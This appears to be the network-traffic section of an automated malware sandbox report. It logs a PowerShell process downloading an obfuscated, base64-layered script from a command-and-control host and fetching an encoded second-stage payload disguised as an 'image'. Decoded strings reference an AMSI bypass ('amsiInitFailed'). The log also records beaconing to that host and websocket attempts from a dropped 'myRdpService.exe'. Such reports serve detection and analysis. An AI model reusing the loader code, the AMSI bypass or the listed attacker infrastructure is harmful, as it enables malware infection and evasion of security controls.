                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{marg


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.11.3049793206.206.126.25280088188C:\Windows\Temp\myRdpService.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 8, 2024 11:31:27.596244097 CET168OUTGET /client/ws HTTP/1.1
                                                                                    Host: 206.206.126.252:8008
                                                                                    Connection: Upgrade
                                                                                    Upgrade: websocket
                                                                                    Sec-WebSocket-Key: F96qsNnVhkO0Bnq7Mo0uCQ==
                                                                                    Sec-WebSocket-Version: 13
                                                                                    Nov 8, 2024 11:31:28.007196903 CET1289INHTTP/1.1 404 Not Found
                                                                                    Cache-Control: private
                                                                                    Upgrade: websocket
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Server: Microsoft-IIS/10.0
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FboUqQWsCGLg%2F%2BbVaHKsjjqNhILBxcktZECUwmH62B92mZEnq622auSsV7fiVXIbaLndf5kJADcYqUgMKrAESFvhOzScoPVa9c1UcFrog1KN6cGaa4O3wGXhFa1GTZJHMHmraikmo8XY"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    CF-RAY: 8df4e4be8bab8bc8-SIN
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=5804&sent=175&recv=121&lost=0&retrans=0&sent_bytes=151118&recv_bytes=15411&delivery_rate=5593869&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Date: Fri, 08 Nov 2024 10:31:27 GMT
                                                                                    Content-Length: 4852
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    3192.168.11.304979423.88.71.298000
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 8, 2024 11:31:40.218031883 CET164OUTGET /client/ws HTTP/1.1
                                                                                    Host: 23.88.71.29:8000
                                                                                    Connection: Upgrade
                                                                                    Upgrade: websocket
                                                                                    Sec-WebSocket-Key: dn0h10Qbzk6QBKAyaFvAMA==
                                                                                    Sec-WebSocket-Version: 13
                                                                                    Nov 8, 2024 11:31:41.071650028 CET1289INHTTP/1.1 404 Not Found
                                                                                    Cache-Control: private
                                                                                    Upgrade: websocket
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Server: Microsoft-IIS/8.5
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RoVttc3D9ljc6ubaTJlPcUshnB4Zr6Z9Z%2FgMMuUSoRxhoqbavXxu2cxToH27WerpWTPiRN58DyHlYb6YEi%2BiF4hYUhXWB2T3mHtnTwqL3tFj23QNKKnjPsrrpor0yxkPkr%2BQNhyw3tVh"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    CF-RAY: 8df4e50cfc3d4db5-FRA
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=26200&sent=598&recv=272&lost=0&retrans=0&sent_bytes=552761&recv_bytes=30007&delivery_rate=1514522&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Date: Fri, 08 Nov 2024 10:31:40 GMT
                                                                                    Content-Length: 4852
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{marg


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.11.3049764104.21.86.2194438708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-08 10:29:28 UTC170OUTGET /JxSkX6 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-11-08 10:29:29 UTC983INHTTP/1.1 200 OK
                                                                                    Date: Fri, 08 Nov 2024 10:29:29 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 6383
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Le2Am%2FqDoijmhzakU7t9PBc5lKClW1rjzqXR%2BKHYl6ojYhnh00qwaCK37Hmq2mbIoEkREvlhKeoHQRyhk7%2Fi%2BG4dFeSm1CZW0%2F3y%2FgRIgY7qQGYhYipicFWJFz26tXUY4gMPk57ND2SM"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=32464&sent=87&recv=91&lost=0&retrans=0&sent_bytes=24760&recv_bytes=55993&delivery_rate=2621184&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e1d5fbe042c8-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=102383&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=784&delivery_rate=37318&cwnd=251&unsent_bytes=0&cid=a8d028ff6c7bb6f0&ts=841&x=0"
                                                                                    2024-11-08 10:29:29 UTC386INData Raw: 24 6e 69 71 7a 6b 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 52 30 35 73 59 30 68 53 63 47 49 79 4e 48 56 55 56 31 5a 36 59 7a 4a 47 62 6c 70 54 61 32 64 6d 56 48 4e 4f 51 32 6c 53 4d 45 6c 45 4d 47 64 4c 52 57 52 73 5a 45 4d 78 52 47 46 58 4d 55 70 69 62 6b 34 77 57 56 63 31 61 6c 70 54 51 6c 68 68 56 7a 52 36 54 57 77 35 55 57 46 49 62 48 70 68 56 30 35 6f 59 6b 55 78 62 47 4a 58 4f 58 6c 6c 55 30 49 34 53 55 55 78 62 46 6c 59 54 6a 46 6a 62 56 56 30 56 44 4a 4b 63 56 70 58 54 6a 42 4a 51 7a 46 52 59 32 30 35 64 31 70 59 53 6a 42 6c 55 30 4a 45 57 56 68 43 61 46 6b 79
                                                                                    Data Ascii: $niqzk=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("R05sY0hScGIyNHVUV1Z6YzJGblpTa2dmVHNOQ2lSMElEMGdLRWRsZEMxRGFXMUpibk4wWVc1alpTQlhhVzR6TWw5UWFIbHphV05oYkUxbGJXOXllU0I4SUUxbFlYTjFjbVV0VDJKcVpXTjBJQzFRY205d1pYSjBlU0JEWVhCaFky
                                                                                    2024-11-08 10:29:29 UTC1369INData Raw: 6a 4d 30 31 6e 5a 6b 4e 43 54 6c 70 58 52 6e 70 6b 57 45 70 73 54 46 55 35 61 57 46 74 56 6d 70 6b 51 32 74 31 55 54 49 35 4d 57 4a 75 55 54 64 45 55 57 39 72 57 6c 4e 42 4f 55 6c 47 64 46 52 6c 57 45 34 77 57 6c 63 77 64 56 5a 59 53 6e 42 59 56 47 38 32 55 6c 68 4f 61 6c 6c 59 51 6d 78 53 52 30 59 77 57 56 5a 4f 4d 47 4e 74 62 48 56 61 65 57 68 69 55 6c 63 31 4d 6d 46 59 53 6e 5a 69 62 54 46 73 59 6d 35 53 5a 45 39 71 63 46 5a 6a 4d 6c 5a 35 56 47 31 47 64 46 70 54 61 7a 64 45 55 57 39 72 5a 46 68 4b 63 30 6c 45 4d 47 64 4a 62 57 67 77 5a 45 68 43 65 6b 39 70 4f 48 5a 6b 57 47 77 77 54 56 63 30 4e 46 70 48 56 6d 74 50 56 31 70 70 54 58 70 6e 64 30 78 74 54 6e 5a 69 55 7a 6c 74 59 56 64 34 62 45 31 35 4f 48 68 4f 56 30 31 33 54 55 64 57 61 45 31 36 57 6d
                                                                                    Data Ascii: jM01nZkNCTlpXRnpkWEpsTFU5aWFtVmpkQ2t1UTI5MWJuUTdEUW9rWlNBOUlGdFRlWE4wWlcwdVZYSnBYVG82UlhOallYQmxSR0YwWVZOMGNtbHVaeWhiUlc1MmFYSnZibTFsYm5SZE9qcFZjMlZ5VG1GdFpTazdEUW9rZFhKc0lEMGdJbWgwZEhCek9pOHZkWGwwTVc0NFpHVmtPV1ppTXpnd0xtTnZiUzltYVd4bE15OHhOV013TUdWaE16Wm
                                                                                    2024-11-08 10:29:29 UTC1369INData Raw: 50 51 3d 3d 22 29 29 3b 0a 24 79 6c 69 63 76 74 69 67 65 6e 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 53 6b 64 46 5a 31 42 54 51 57 6c 6b 56 7a 56 79 59 6d 30 35 4d 32 4a 70 53 54 64 4a 51 54 42 4c 5a 45 68 4b 4e 55 6c 49 63 32 64 4b 52 30 56 6e 55 46 4e 43 59 6c 55 7a 62 48 70 6b 52 31 5a 30 54 47 78 57 65 57 46 57 4d 44 5a 50 61 31 5a 36 57 54 4a 47 64 31 70 56 55 6d 68 6b 52 30 5a 55 5a 45 68 4b 63 47 4a 74 59 32 39 4c 52 57 52 73 5a 45 4d 78 57 47 4a 58 62 46 42 5a 62 58 42 73 57 54 4e 52 5a 30 78 56 4e 57 68 69 56 31 5a 36 59 30 64 47 61 6c 70 54 51 57 6c 6a 62 54
                                                                                    Data Ascii: PQ=="));$ylicvtigen=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("SkdFZ1BTQWlkVzVyYm05M2JpSTdJQTBLZEhKNUlIc2dKR0VnUFNCYlUzbHpkR1Z0TGxWeWFWMDZPa1Z6WTJGd1pVUmhkR0ZUZEhKcGJtY29LRWRsZEMxWGJXbFBZbXBsWTNRZ0xVNWhiV1Z6Y0dGalpTQWljbT
                                                                                    2024-11-08 10:29:29 UTC1369INData Raw: 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 55 56 64 53 61 30 78 57 55 6a 56 6a 52 31 56 6e 54 46 5a 53 4e 57 4e 48 56 6b 56 61 56 31 70 77 59 6d 31 73 4d 47 46 58 22 29 29 3b 0a 24 73 62 63 61 73 62 6f 70 6c 70 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 55 48 56 69 62 47 6c 6a 4c 46 4e 30 59 58 52 70 59 77 3d 3d 22 29 29 3b 0a 24 75 69 6d 7a 70 61 69 65 65 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41
                                                                                    Data Ascii: coding]::ASCII.GetString([System.Convert]::FromBase64String("UVdSa0xWUjVjR1VnTFZSNWNHVkVaV1pwYm1sMGFX"));$sbcasboplp=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("UHVibGljLFN0YXRpYw=="));$uimzpaiee=[System.Text.Encoding]::A
                                                                                    2024-11-08 10:29:29 UTC516INData Raw: 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 55 33 6c 7a 64 47 56 74 4c 67 3d 3d 22 29 29 3b 0a 24 62 77 63 64 64 6e 62 68 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 64 47 56 74 4c 6b 4e 76 63 6d 55 3d 22 29 29 3b 0a 24 6a 66 79 73 74 62 6d 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 55 33 6c 7a 22 29 29 3b 0a 24 74 62 67 67 62 75 6e 61 73 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63
                                                                                    Data Ascii: Base64String("U3lzdGVtLg=="));$bwcddnbh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dGVtLkNvcmU="));$jfystbm=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lz"));$tbggbunas=[System.Text.Enc
                                                                                    2024-11-08 10:29:29 UTC1369INData Raw: 28 22 59 57 31 7a 61 55 6c 75 61 58 52 47 59 57 6c 73 5a 57 51 3d 22 29 29 3b 0a 24 76 63 61 75 67 6d 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 22 29 29 3b 0a 24 6e 6e 63 68 67 3d 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 54 57 46 75 59 57 64 6c 62 57 56 75 64 43 35 42 64 58 52 76 62 57 46 30 61 57 39 75 4c 6b 46 74 63 32 6c 56 64 47 6c 73 63 77 3d 3d 22 29 29 3b 0a 24 76 74 77 75 68 71
                                                                                    Data Ascii: ("YW1zaUluaXRGYWlsZWQ="));$vcaugm=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));$nnchg=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("TWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtc2lVdGlscw=="));$vtwuhq
                                                                                    2024-11-08 10:29:29 UTC5INData Raw: 29 29 29 3b 0a
                                                                                    Data Ascii: )));


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.11.3049765104.21.86.2194438708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-08 10:29:30 UTC374OUTGET /file3/15c00ea36e9730cbe066155b6df42f28e74ca16ac92a992456106ac76962068b98b8fdbbddfe1fc26714001dac68f55dfde6394439e7568362e53d351476f01a0d0741ebee7cb085677b1764accc0b029f3923b6e1a657607c54dee2db6106bd/Windows%20Defender/16/16/user/210 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    2024-11-08 10:29:31 UTC1057INHTTP/1.1 200 OK
                                                                                    Date: Fri, 08 Nov 2024 10:29:31 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 2874
                                                                                    Connection: close
                                                                                    content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ob3dXxUip%2FZZfUHtq2JcUJrVrtToSIZZ9fzEEe1m92ovPBD9iZZP%2F1RurqSHwJ2mo%2BvDv1gIUzq6oG26EUIzHntTip3Zh3TPripyVzp1t5Bl1%2FSo8lN8c1336m6KYTA7%2FKMf5%2Br37EJu"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=47950&sent=48&recv=54&lost=0&retrans=0&sent_bytes=15933&recv_bytes=23341&delivery_rate=2142333&cwnd=256&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    X-Powered-By: ARR/3.0
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8df4e1e48eec42b3-EWR
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=102280&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1012&delivery_rate=37408&cwnd=252&unsent_bytes=0&cid=e7e66cbda180e780&ts=832&x=0"
                                                                                    2024-11-08 10:29:31 UTC312INData Raw: 25 68 67 7b 63 6d 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 63 54 6a 79 55 6f 71 47 4c 31 34 54 5b 46 30 4e 57 44 6d 37 56 57 65 4b 64 47 6d 70 58 7b 43 60 60 6a 4b 71 55 56 30 60 60 44 30 37 53 6c 30 60 57 30 71 75 56 6a 53 46 63 44 38 59 56 6c 79 51 53 44 54 78 55 57 53 47 64 44 30 75 57 55 4f 4e 57 47 6a 30 55 56 71 57 4c 6a 34 37 56 59 65 4f 57 46 4f 35 55 56 30 60 60 54 30 49 57 59 6d 4e 57 30 54 79 55 6c 71 4a 60 31 34 75 52 55 53 5b 57 47 44 31 56 6d 53 47 65 31 34 49 53 59 71 4f 53 46 75 34 56 6c 30 4b 64 54 38 44 53 59 71 4f 57 44 5b 70 56 6d 65 56 60 44 30 37
                                                                                    Data Ascii: %hg{cm<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#cTjyUoqGL14T[F0NWDm7VWeKdGmpX{C``jKqUV0``D07Sl0`W0quVjSFcD8YVlyQSDTxUWSGdD0uWUONWGj0UVqWLj47VYeOWFO5UV0``T0IWYmNW0TyUlqJ`14uRUS[WGD1VmSGe14ISYqOSFu4Vl0KdT8DSYqOWD[pVmeV`D07
                                                                                    2024-11-08 10:29:31 UTC1369INData Raw: 56 71 4a 60 6a 38 49 56 55 57 51 53 31 30 32 55 6f 71 4b 64 44 30 59 53 6c 75 4e 57 47 4b 72 56 57 53 6b 64 6a 34 54 54 55 53 60 57 30 6d 71 55 32 62 76 52 31 71 49 55 6f 5b 6a 57 7b 54 76 52 54 50 76 5b 31 30 54 50 59 65 51 65 7b 43 4d 53 47 47 77 55 6a 4f 6f 4c 44 75 60 63 6d 5b 30 56 55 4f 52 62 46 48 78 4f 46 65 57 4c 6d 5b 30 56 6a 4f 42 4f 31 53 53 63 33 65 4b 50 31 47 6f 58 31 65 46 64 57 6d 59 4c 46 38 4b 53 6f 53 53 57 55 40 34 60 56 47 75 57 6c 71 6a 53 6b 43 6f 52 6a 65 35 65 6d 6e 76 4c 59 71 60 64 54 47 76 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 47 70 52 54 57 4e 65 6c 4b 74 56 6c 79 6b 63 6d 47 6f 56 56 31 34 60 33 57 55 50 6b 43 68 64 54 4b 37 5b 44 69 4a 62 46 4b 75 58 31 34 45 60 54 47 6f 52 54 4f 43 60 33 4c 7b 54 6f 6d 69 57 7b 57 74
                                                                                    Data Ascii: VqJ`j8IVUWQS102UoqKdD0YSluNWGKrVWSkdj4TTUS`W0mqU2bvR1qIUo[jW{TvRTPv[10TPYeQe{CMSGGwUjOoLDu`cm[0VUORbFHxOFeWLm[0VjOBO1SSc3eKP1GoX1eFdWmYLF8KSoSSWU@4`VGuWlqjSkCoRje5emnvLYq`dTGvSGGwUjOqPVeKP1GpRTWNelKtVlykcmGoVV14`3WUPkChdTK7[DiJbFKuX14E`TGoRTOC`3L{TomiW{Wt
                                                                                    2024-11-08 10:29:31 UTC1193INData Raw: 65 4c 57 33 50 76 52 54 53 43 62 44 53 53 62 45 65 44 54 56 38 4a 53 47 47 77 52 6c 53 48 52 6b 57 6d 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 54 56 6d 62 30 60 31 6d 45 52 6c 6d 60 57 33 53 76 58 6c 6d 42 60 33 48 7b 5b 49 57 68 53 7b 6d 6e 56 6a 4f 43 60 33 53 58 52 6f 43 4b 60 6f 4f 4e 50 33 65 73 52 6a 71 49 55 6f 5b 68 63 6d 4b 72 58 6c 34 53 5b 30 43 55 50 6a 71 68 63 6d 71 33 58 55 4b 57 65 47 58 78 57 6c 6d 57 63 57 5b 35 5b 47 65 56 64 6c 53 45 50 59 53 56 56 44 71 76 52 54 4f 52 4c 56 4f 75 60 33 65 4c 57 6d 5b 37 56 6d 57 4a 60 46 4c 78 63 46 71 57 53 31 5b 34 58 7b 4b 72 65 57 71 37 62 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4a 53 31 6e 30 5b 44 65 56 50 6c 4f 74 52 6c 69 6d 54 31 44 34 52 54 4f 52 60 6c 48 78 4f
                                                                                    Data Ascii: eLW3PvRTSCbDSSbEeDTV8JSGGwRlSHRkWme{CMRTOC[1mEPVeKP1KTVmb0`1mERlm`W3SvXlmB`3H{[IWhS{mnVjOC`3SXRoCK`oONP3esRjqIUo[hcmKrXl4S[0CUPjqhcmq3XUKWeGXxWlmWcW[5[GeVdlSEPYSVVDqvRTORLVOu`3eLWm[7VmWJ`FLxcFqWS1[4X{KreWq7b14E`TGoRTOC[1mEPVeJS1n0[DeVPlOtRlimT1D4RTOR`lHxO


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.11.3049766104.21.86.2194438708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-08 10:29:31 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321187377204903035f2c6edc84e1877b6a70 HTTP/1.1
                                                                                    Content-Type: application/json
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                    Host: uyt1n8ded9fb380.com
                                                                                    Content-Length: 308
                                                                                    2024-11-08 10:29:31 UTC308OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 75 79 74 31 6e 38 64 65 64 39 66 62 33 38 30 2e 63 6f 6d 2f 66 69 6c 65 32 2f 33 32 32 66 39 63 61 64 65 36 65 64 66 32 37 37 35 34 65 39 39 39 30 38 61 33 62 36 31 33 63 62 62 32 38 37 30 62 39 30 65 65 36 36 31 36 35 32 35 34 30 38 35 66 37 63 38 66 63 32 34 34 66 37 64 61 35 65 35 36 62 35 37 31 37 35 37 66 35 32 33 61 62 31 62 37 34 66 30 62 32 66 61 33 31 66 65 66 66 64 31 65 39 66 65 38 31 36 31 31 31 32 65 37 35 36 39 32 35 36 37 36 30 31 37 31 32 66 62 30 65 32 35 65 35 36 32 64 36 62 38 61 34 38 65 31 30 34 61 33 30 39 32 66 62 32 38 31 33 31 31 63 65 65 61 33 32 36 33 62 33 30 66 38 64 30 30 31 36 31 31 61 61 35 39 32 66 37 31 32 30 39 37 34 34 34
                                                                                    Data Ascii: [ "\"begin download https://uyt1n8ded9fb380.com/file2/322f9cade6edf27754e99908a3b613cbb2870b90ee66165254085f7c8fc244f7da5e56b571757f523ab1b74f0b2fa31feffd1e9fe8161112e75692567601712fb0e25e562d6b8a48e104a3092fb281311ceea3263b30f8d001611aa592f712097444
                                                                                    2024-11-08 10:29:32 UTC936INHTTP/1.1 200 OK
